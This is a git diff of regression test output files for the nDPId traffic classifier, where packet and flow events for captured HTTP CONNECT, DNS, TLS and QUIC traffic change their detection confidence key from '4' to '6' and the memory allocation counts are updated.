a/test/results/http_connect.pcap.out b/test/results/http_connect.pcap.out index b1f4c8829..21e160d8f 100644 --- a/test/results/http_connect.pcap.out +++ b/test/results/http_connect.pcap.out 
@@ -4,21 +4,21 @@ 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1631454722864,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722864,"pkt":"AAwpTU5kKBaoBOm8CABFAAA0iNFAAIAG7ajAqAFnwKgBkgayH5A7mDABAAAAAIAC+vBd+gAAAgQFtAEDAwgBAQQC"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1631454722864,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722864,"pkt":"KBaoBOm8AAwpTU5kCABFAAA0AABAAEAGtnrAqAGSwKgBZx+QBrLnDc0lO5gwAoAS+vCEcAAAAgQFtAEBBAIBAwMH"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1631454722866,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1631454722866,"pkt":"AAwpTU5kKBaoBOm8CABFAAAoiNJAAIAG7bPAqAFnwKgBkgayH5A7mDAC5w3NJlAQBALhdwAAAAAAAAAA"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722864,"flow_last_seen":1631454722867,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722864,"flow_last_seen":1631454722867,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1631454722867,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1631454722867,"pkt":"AAwpGN5XAAwpTU5kCABFAABDZMpAAEARUfvAqAGSwKgBArqXADUAL4Ql9bcBAAABAAAAAAABBmFwYWNoZQNvcmcAAAEAAQAAKQIAAAAAAAAA"} 
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apache.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apache.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1631454722867,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1631454722867,"pkt":"AAwpTU5kAAwpGN5XCABFAABTqZtAAEARDRrAqAECwKgBkgA1upcAP92U9beBgAABAAEAAAABBmFwYWNoZQNvcmcAAAEAAcAMAAEAAQAAA0oABJdlAoQAACkE0AAAAAAAAA=="} -00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apache.org","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"151.101.2.132"}} +00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"apache.org","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"151.101.2.132"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1631454722867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631454722867,"pkt":"ACWQX+cTAAwpTU5kCABFAAA8Fy1AAEAGx2vAqAGSl2UChIyAAbsTD57aAAAAAKAC+vBcUgAAAgQFtAQCCAoKBFeEAAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1631454722876,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631454722876,"pkt":"AAwpTU5kACWQX+cTCABFAAA8AABAADwG4piXZQKEwKgBkgG7jICt6jOtEw+e26AS\/\/+T8gAAAgQFdAQCCAosPaiUCgRXhAEDAwk="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1631454722876,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722876,"pkt":"ACWQX+cTAAwpTU5kCABFAAA0Fy5AAEAGx3LAqAGSl2UChIyAAbsTD57breozroAQAfZcSgAAAQEICgoEV40sPaiU"} -00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722867,"flow_last_seen":1631454722879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631454722879,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631454722867,"flow_last_seen":1631454722895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":1901,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1631454722895,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1631454722867,"flow_last_seen":1631454722977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":32652,"flow_avg_l4_payload_len":562,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1631454722864,"flow_last_seen":1631454722977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5536,"flow_tot_l4_payload_len":24627,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722867,"flow_last_seen":1631454722879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631454722879,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631454722867,"flow_last_seen":1631454722895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":1901,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1631454722895,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1631454722867,"flow_last_seen":1631454722977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":32652,"flow_avg_l4_payload_len":562,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1631454722864,"flow_last_seen":1631454722977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5536,"flow_tot_l4_payload_len":24627,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-payload-len":57373,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":22,"global_ts_msec":1631454722977} ~~~~~~~~~~~~~~~~~~~~ SUMMARY 
~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 100/100 @@ -28,9 +28,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5876658 bytes -~~ total memory freed........: 5876658 bytes -~~ total allocations/frees...: 118228/118228 +~~ total memory allocated....: 6010292 bytes +~~ total memory freed........: 6010292 bytes +~~ total allocations/frees...: 120990/120990 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 924 chars diff --git a/test/results/http_ipv6.pcap.out b/test/results/http_ipv6.pcap.out index c02451e52..58d48d91d 100644 --- a/test/results/http_ipv6.pcap.out +++ b/test/results/http_ipv6.pcap.out 
@@ -5,11 +5,11 @@ 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1448269123971,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269123971,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBABggEAAAAAAAAIA4qAA1AAAEAA3qswP\/+pw1MAbueThTRAVNLJelYgBABCVvaAAABAQgKD8WrNBINPNs="} 00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127395,"flow_last_seen":1448269127395,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1448269127395,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1448269127395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":268,"pkt_l4_len":214,"thread_ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAANYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcnAKcmsggBgBYRYsAAABAQgKEg1sPOPdU5wXAwMAsUohbF6hqm2iPbr5acUercfvDKKXo6eRxQREALqHMULPkKcrij9I+s937a+Ptj\/48lLHQ1Wb3SgwI5IkBSOhrv6IVrq\/yOhvf7XOjabBqvbdcaHqf1DGDHgPPOpYr+dJO5wcSH25xkyZHXLU0QNqpczDg7dKCMPOVcOltspkl5ZzoyNyh0jvlmeYCBWg6kXBip25FBniFP0s4NZksUmy3aWhoSbUDQ+LvhRDb4xtwZyJTw=="} 
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127395,"flow_last_seen":1448269127395,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1448269127395,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127395,"flow_last_seen":1448269127395,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1448269127395,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1448269127395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":124,"pkt_l4_len":70,"thread_ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAEYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcyYKcmsggBgBYRWcAAABAQgKEg1sPOPdU5wXAwMAISEEhc9+XaFrGjMSta2tz\/npJ9wouC3HutuqGdJZFlD+8g=="} 
00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127400,"flow_last_seen":1448269127400,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1448269127400,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02275{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1448269127400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1412,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1412,"pkt_l4_len":1358,"thread_ts_msec":1448269127400,"pkt":"UMWNrEEBeKzApw1Mht1gAAAABU4RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXs2sBuwVOGq8NSb7i0\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\/d3HOJRMDI1eybp5+Rccf9WUtVHu\/cGtxBbc83x\/ixhHuZYGb85GDRSl0WTDzqXHGQAAABDQzEyQ2hyb21lLzQ2LjAuMjQ5MC44MCBMaW51eCB4ODZfNjRJY0N+fBRzPpi9ZOX2cffRAAAAAFg1MDkAABAAHgAAAKnIKfkyK+SzUnB6164ARpx8JYjcWyR0opR8VfpSZa5LAQAAAEMyNTWqEkFTJwbowuJjGoJ9cYVfQAt7kKmueesKxAMAMPg3G85FTSE++LOaAtQpI1KVeq729JfhjhoCsaupNHH2PFh7nIyQFBUHu\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"} 
-00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127400,"flow_last_seen":1448269127400,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1448269127400,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.it","user_agent":"Chrome\/46.0.2490.80 Linux x86_64"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127400,"flow_last_seen":1448269127400,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1448269127400,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.it","user_agent":"Chrome\/46.0.2490.80 Linux x86_64"}} 
